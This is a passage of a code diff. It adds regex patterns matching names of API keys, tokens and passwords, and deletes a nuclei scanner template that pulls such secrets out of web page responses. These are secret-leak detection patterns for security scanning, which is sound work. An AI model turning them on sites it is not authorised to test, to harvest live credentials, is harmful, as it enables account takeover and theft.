+ - "(?i)[\"']?cloudant[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?cloudant[_-]?parsed[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?cloudant[_-]?order[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?cloudant[_-]?instance[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?cloudant[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?cloudant[_-]?audited[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?cloudant[_-]?archived[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?cloud[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?clojars[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?cli[_-]?e2e[_-]?cma[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?claimr[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?claimr[_-]?superuser[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?claimr[_-]?db[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?claimr[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ci[_-]?user[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ci[_-]?server[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ci[_-]?registry[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ci[_-]?project[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ci[_-]?deploy[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?chrome[_-]?refresh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?chrome[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?cheverny[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?cf[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?certificate[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?censys[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?cattle[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?cattle[_-]?agent[_-]?instance[_-]?auth[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?cattle[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?cargo[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?cache[_-]?s3[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?bx[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?bx[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?bundlesize[_-]?github[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?built[_-]?branch[_-]?deploy[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?bucketeer[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?bucketeer[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?browserstack[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?browser[_-]?stack[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?brackets[_-]?repo[_-]?oauth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?bluemix[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?bluemix[_-]?pwd[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?bluemix[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?bluemix[_-]?pass[_-]?prod[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?bluemix[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?bluemix[_-]?auth[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?bluemix[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?bintraykey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?bintray[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?bintray[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?bintray[_-]?gpg[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?bintray[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?bintray[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?b2[_-]?bucket[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?b2[_-]?app[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?awssecretkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?awscn[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?awscn[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?awsaccesskeyid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?aws[_-]?ses[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?aws[_-]?ses[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?aws[_-]?secrets[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?aws[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?aws[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?aws[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?aws[_-]?config[_-]?secretaccesskey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?aws[_-]?config[_-]?accesskeyid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?aws[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?aws[_-]?access[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?author[_-]?npm[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?author[_-]?email[_-]?addr[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?auth0[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?auth0[_-]?api[_-]?clientsecret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?assistant[_-]?iam[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?artifacts[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?artifacts[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?artifacts[_-]?bucket[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?artifacts[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?artifacts[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?artifactory[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?argos[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?apple[_-]?id[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?appclientsecret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?app[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?app[_-]?secrete[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?app[_-]?report[_-]?token[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?app[_-]?bucket[_-]?perm[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?apigw[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?apiary[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?api[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?api[_-]?key[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?api[_-]?key[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?aos[_-]?sec[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?aos[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ansible[_-]?vault[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?android[_-]?docs[_-]?deploy[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?anaconda[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?amazon[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?amazon[_-]?bucket[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?alicloud[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?alicloud[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?alias[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?algolia[_-]?search[_-]?key[_-]?1[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?algolia[_-]?search[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?algolia[_-]?search[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?algolia[_-]?api[_-]?key[_-]?search[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?algolia[_-]?api[_-]?key[_-]?mcm[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?algolia[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?algolia[_-]?admin[_-]?key[_-]?mcm[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?algolia[_-]?admin[_-]?key[_-]?2[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?algolia[_-]?admin[_-]?key[_-]?1[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?air[-_]?table[-_]?api[-_]?key[\"']?[=:][\"']?.+[\"']"
+ - "(?i)[\"']?adzerk[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?admin[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?account[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?access[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?access[_-]?key[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
diff --git a/nuclei-templates/Other/credentials-disclosure-1256.yaml b/nuclei-templates/Other/credentials-disclosure-1256.yaml
deleted file mode 100644
index b2d2154bf5..0000000000
--- a/nuclei-templates/Other/credentials-disclosure-1256.yaml
+++ /dev/null
@@ -1,715 +0,0 @@
-id: credentials-disclosure
-
-# Extract secrets regex like api keys, password, token, etc ... for different services
-# Always validate the leaked key/tokens/passwords to make sure it's valid, a token/keys without any impact is not an valid issue.
-# Severity is not fixed in this case, it varies from none to critical depending upon impact of disclosed key/tokes.
-# Regex count:- 687
-
-# Notes:-
-# This template requires manual inspection once found valid match.
-# Generic token could be anything matching below regex.
-# Impact of leaked token depends on validation of leaked token.
-
-info:
- name: Credentials Disclosure Check
- author: Sy3Omda
- severity: info
- description: Look for multiple keys/tokens/passwords in the page response.
- tags: exposure,token
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}"
-
- extractors:
- - type: regex
- part: body
- regex:
- - "zopim[_-]?account[_-]?key(=| =|:| :)"
- - "zhuliang[_-]?gh[_-]?token(=| =|:| :)"
- - "zensonatypepassword(=| =|:| :)"
- - "zendesk[_-]?travis[_-]?github(=| =|:| :)"
- - "yt[_-]?server[_-]?api[_-]?key(=| =|:| :)"
- - "yt[_-]?partner[_-]?refresh[_-]?token(=| =|:| :)"
- - "yt[_-]?partner[_-]?client[_-]?secret(=| =|:| :)"
- - "yt[_-]?client[_-]?secret(=| =|:| :)"
- - "yt[_-]?api[_-]?key(=| =|:| :)"
- - "yt[_-]?account[_-]?refresh[_-]?token(=| =|:| :)"
- - "yt[_-]?account[_-]?client[_-]?secret(=| =|:| :)"
- - "yangshun[_-]?gh[_-]?token(=| =|:| :)"
- - "yangshun[_-]?gh[_-]?password(=| =|:| :)"
- - "www[_-]?googleapis[_-]?com(=| =|:| :)"
- - "wpt[_-]?ssh[_-]?private[_-]?key[_-]?base64(=| =|:| :)"
- - "wpt[_-]?ssh[_-]?connect(=| =|:| :)"
- - "wpt[_-]?report[_-]?api[_-]?key(=| =|:| :)"
- - "wpt[_-]?prepare[_-]?dir(=| =|:| :)"
- - "wpt[_-]?db[_-]?user(=| =|:| :)"
- - "wpt[_-]?db[_-]?password(=| =|:| :)"
- - "wporg[_-]?password(=| =|:| :)"
- - "wpjm[_-]?phpunit[_-]?google[_-]?geocode[_-]?api[_-]?key(=| =|:| :)"
- - "wordpress[_-]?db[_-]?user(=| =|:| :)"
- - "wordpress[_-]?db[_-]?password(=| =|:| :)"
- - "wincert[_-]?password(=| =|:| :)"
- - "widget[_-]?test[_-]?server(=| =|:| :)"
- - "widget[_-]?fb[_-]?password[_-]?3(=| =|:| :)"
- - "widget[_-]?fb[_-]?password[_-]?2(=| =|:| :)"
- - "widget[_-]?fb[_-]?password(=| =|:| :)"
- - "widget[_-]?basic[_-]?password[_-]?5(=| =|:| :)"
- - "widget[_-]?basic[_-]?password[_-]?4(=| =|:| :)"
- - "widget[_-]?basic[_-]?password[_-]?3(=| =|:| :)"
- - "widget[_-]?basic[_-]?password[_-]?2(=| =|:| :)"
- - "widget[_-]?basic[_-]?password(=| =|:| :)"
- - "watson[_-]?password(=| =|:| :)"
- - "watson[_-]?device[_-]?password(=| =|:| :)"
- - "watson[_-]?conversation[_-]?password(=| =|:| :)"
- - "wakatime[_-]?api[_-]?key(=| =|:| :)"
- - "vscetoken(=| =|:| :)"
- - "visual[_-]?recognition[_-]?api[_-]?key(=| =|:| :)"
- - "virustotal[_-]?apikey(=| =|:| :)"
- - "vip[_-]?github[_-]?deploy[_-]?key[_-]?pass(=| =|:| :)"
- - "vip[_-]?github[_-]?deploy[_-]?key(=| =|:| :)"
- - "vip[_-]?github[_-]?build[_-]?repo[_-]?deploy[_-]?key(=| =|:| :)"
- - "v[_-]?sfdc[_-]?password(=| =|:| :)"
- - "v[_-]?sfdc[_-]?client[_-]?secret(=| =|:| :)"
- - "usertravis(=| =|:| :)"
- - "user[_-]?assets[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
- - "user[_-]?assets[_-]?access[_-]?key[_-]?id(=| =|:| :)"
- - "use[_-]?ssh(=| =|:| :)"
- - "us[_-]?east[_-]?1[_-]?elb[_-]?amazonaws[_-]?com(=| =|:| :)"
- - "urban[_-]?secret(=| =|:| :)"
- - "urban[_-]?master[_-]?secret(=| =|:| :)"
- - "urban[_-]?key(=| =|:| :)"
- - "unity[_-]?serial(=| =|:| :)"
- - "unity[_-]?password(=| =|:| :)"
- - "twitteroauthaccesstoken(=| =|:| :)"
- - "twitteroauthaccesssecret(=| =|:| :)"
- - "twitter[_-]?consumer[_-]?secret(=| =|:| :)"
- - "twitter[_-]?consumer[_-]?key(=| =|:| :)"
- - "twine[_-]?password(=| =|:| :)"
- - "twilio[_-]?token(=| =|:| :)"
- - "twilio[_-]?sid(=| =|:| :)"
- - "twilio[_-]?configuration[_-]?sid(=| =|:| :)"
- - "twilio[_-]?chat[_-]?account[_-]?api[_-]?service(=| =|:| :)"
- - "twilio[_-]?api[_-]?secret(=| =|:| :)"
- - "twilio[_-]?api[_-]?key(=| =|:| :)"
- - "trex[_-]?okta[_-]?client[_-]?token(=| =|:| :)"
- - "trex[_-]?client[_-]?token(=| =|:| :)"
- - "travis[_-]?token(=| =|:| :)"
- - "travis[_-]?secure[_-]?env[_-]?vars(=| =|:| :)"
- - "travis[_-]?pull[_-]?request(=| =|:| :)"
- - "travis[_-]?gh[_-]?token(=| =|:| :)"
- - "travis[_-]?e2e[_-]?token(=| =|:| :)"
- - "travis[_-]?com[_-]?token(=| =|:| :)"
- - "travis[_-]?branch(=| =|:| :)"
- - "travis[_-]?api[_-]?token(=| =|:| :)"
- - "travis[_-]?access[_-]?token(=| =|:| :)"
- - "token[_-]?core[_-]?java(=| =|:| :)"
- - "thera[_-]?oss[_-]?access[_-]?key(=| =|:| :)"
- - "tester[_-]?keys[_-]?password(=| =|:| :)"
- - "test[_-]?test(=| =|:| :)"
- - "test[_-]?github[_-]?token(=| =|:| :)"
- - "tesco[_-]?api[_-]?key(=| =|:| :)"
- - "svn[_-]?pass(=| =|:| :)"
- - "surge[_-]?token(=| =|:| :)"
- - "surge[_-]?login(=| =|:| :)"
- - "stripe[_-]?public(=| =|:| :)"
- - "stripe[_-]?private(=| =|:| :)"
- - "strip[_-]?secret[_-]?key(=| =|:| :)"
- - "strip[_-]?publishable[_-]?key(=| =|:| :)"
- - "stormpath[_-]?api[_-]?key[_-]?secret(=| =|:| :)"
- - "stormpath[_-]?api[_-]?key[_-]?id(=| =|:| :)"
- - "starship[_-]?auth[_-]?token(=| =|:| :)"
- - "starship[_-]?account[_-]?sid(=| =|:| :)"
- - "star[_-]?test[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
- - "star[_-]?test[_-]?location(=| =|:| :)"
- - "star[_-]?test[_-]?bucket(=| =|:| :)"
- - "star[_-]?test[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :)"
- - "staging[_-]?base[_-]?url[_-]?runscope(=| =|:| :)"
- - "ssmtp[_-]?config(=| =|:| :)"
- - "sshpass(=| =|:| :)"
- - "srcclr[_-]?api[_-]?token(=| =|:| :)"
- - "square[_-]?reader[_-]?sdk[_-]?repository[_-]?password(=| =|:| :)"
- - "sqssecretkey(=| =|:| :)"
- - "sqsaccesskey(=| =|:| :)"
- - "spring[_-]?mail[_-]?password(=| =|:| :)"
- - "spotify[_-]?api[_-]?client[_-]?secret(=| =|:| :)"
- - "spotify[_-]?api[_-]?access[_-]?token(=| =|:| :)"
- - "spaces[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
- - "spaces[_-]?access[_-]?key[_-]?id(=| =|:| :)"
- - "soundcloud[_-]?password(=| =|:| :)"
- - "soundcloud[_-]?client[_-]?secret(=| =|:| :)"
- - "sonatypepassword(=| =|:| :)"
- - "sonatype[_-]?token[_-]?user(=| =|:| :)"
- - "sonatype[_-]?token[_-]?password(=| =|:| :)"
- - "sonatype[_-]?password(=| =|:| :)"
- - "sonatype[_-]?pass(=| =|:| :)"
- - "sonatype[_-]?nexus[_-]?password(=| =|:| :)"
- - "sonatype[_-]?gpg[_-]?passphrase(=| =|:| :)"
- - "sonatype[_-]?gpg[_-]?key[_-]?name(=| =|:| :)"
- - "sonar[_-]?token(=| =|:| :)"
- - "sonar[_-]?project[_-]?key(=| =|:| :)"
- - "sonar[_-]?organization[_-]?key(=| =|:| :)"
- - "socrata[_-]?password(=| =|:| :)"
- - "socrata[_-]?app[_-]?token(=| =|:| :)"
- - "snyk[_-]?token(=| =|:| :)"
- - "snyk[_-]?api[_-]?token(=| =|:| :)"
- - "snoowrap[_-]?refresh[_-]?token(=| =|:| :)"
- - "snoowrap[_-]?password(=| =|:| :)"
- - "snoowrap[_-]?client[_-]?secret(=| =|:| :)"
- - "slate[_-]?user[_-]?email(=| =|:| :)"
- - "slash[_-]?developer[_-]?space[_-]?key(=| =|:| :)"
- - "slash[_-]?developer[_-]?space(=| =|:| :)"
- - "signing[_-]?key[_-]?sid(=| =|:| :)"
- - "signing[_-]?key[_-]?secret(=| =|:| :)"
- - "signing[_-]?key[_-]?password(=| =|:| :)"
- - "signing[_-]?key(=| =|:| :)"
- - "setsecretkey(=| =|:| :)"
- - "setdstsecretkey(=| =|:| :)"
- - "setdstaccesskey(=| =|:| :)"
- - "ses[_-]?secret[_-]?key(=| =|:| :)"
- - "ses[_-]?access[_-]?key(=| =|:| :)"
- - "service[_-]?account[_-]?secret(=| =|:| :)"
- - "sentry[_-]?key(=| =|:| :)"
- - "sentry[_-]?endpoint(=| =|:| :)"
- - "sentry[_-]?default[_-]?org(=| =|:| :)"
- - "sentry[_-]?auth[_-]?token(=| =|:| :)"
- - "sendwithus[_-]?key(=| =|:| :)"
- - "sendgrid[_-]?username(=| =|:| :)"
- - "sendgrid[_-]?user(=| =|:| :)"
- - "sendgrid[_-]?password(=| =|:| :)"
- - "sendgrid[_-]?key(=| =|:| :)"
- - "sendgrid[_-]?api[_-]?key(=| =|:| :)"
- - "sendgrid(=| =|:| :)"
- - "selion[_-]?selenium[_-]?host(=| =|:| :)"
- - "selion[_-]?log[_-]?level[_-]?dev(=| =|:| :)"
- - "segment[_-]?api[_-]?key(=| =|:| :)"
- - "secretkey(=| =|:| :)"
- - "secretaccesskey(=| =|:| :)"
- - "secret[_-]?key[_-]?base(=| =|:| :)"
- - "secret[_-]?9(=| =|:| :)"
- - "secret[_-]?8(=| =|:| :)"
- - "secret[_-]?7(=| =|:| :)"
- - "secret[_-]?6(=| =|:| :)"
- - "secret[_-]?5(=| =|:| :)"
- - "secret[_-]?4(=| =|:| :)"
- - "secret[_-]?3(=| =|:| :)"
- - "secret[_-]?2(=| =|:| :)"
- - "secret[_-]?11(=| =|:| :)"
- - "secret[_-]?10(=| =|:| :)"
- - "secret[_-]?1(=| =|:| :)"
- - "secret[_-]?0(=| =|:| :)"
- - "sdr[_-]?token(=| =|:| :)"
- - "scrutinizer[_-]?token(=| =|:| :)"
- - "sauce[_-]?access[_-]?key(=| =|:| :)"
- - "sandbox[_-]?aws[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
- - "sandbox[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :)"
